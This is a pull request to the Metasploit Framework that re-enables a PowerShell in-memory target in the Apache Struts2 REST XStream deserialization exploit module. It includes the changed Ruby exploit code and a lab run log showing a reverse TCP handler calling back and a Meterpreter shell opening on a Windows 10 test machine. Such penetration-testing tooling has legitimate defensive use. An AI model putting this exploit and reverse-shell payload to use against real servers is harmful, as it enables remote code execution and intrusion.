### PR TITLE
Uncomment PSH target in struts2_rest_xstream

### DIFF
--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -93,7 +93,12 @@ class MetasploitModule < Msf::Exploit::Remote
     when /Python/
       %W{python -c #{cmd}}
     when /PowerShell/
-      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
+      payload ? cmd_psh_payload(
+        cmd,
+        payload.arch,
+        remove_comspec:       true,
+        encode_final_payload: true
+      ).split : %W{powershell.exe -c #{cmd}}
     when /Windows/
       %W{cmd.exe /c #{cmd}}
     end
@@ -108,7 +113,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'data'   => xstream_payload(cmd)
     )
 
-    check_response(res) || fail_with(Failure::UnexpectedReply, res.inspect)
+    return false unless check_response(res)
+
+    true
   end
 
   # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO

--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -43,12 +43,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'Platform'   => 'python',
           'Arch'       => ARCH_PYTHON
         ],
-=begin this stuff that doesn't work yet
         ['PowerShell (In-Memory)',
           'Platform'   => 'win',
           'Arch'       => [ARCH_X86, ARCH_X64]
         ],
-=end
         ['Linux (Dropper)',
           'Platform'   => 'linux',
           'Arch'       => [ARCH_X86, ARCH_X64]
@@ -95,7 +93,6 @@ class MetasploitModule < Msf::Exploit::Remote
     when /Python/
       %W{python -c #{cmd}}
     when /PowerShell/
-      # This doesn't work yet
       %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
     when /Windows/
       %W{cmd.exe /c #{cmd}}


### PR DESCRIPTION
I'm full of shit. It works.

```
msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```

#8924, #9423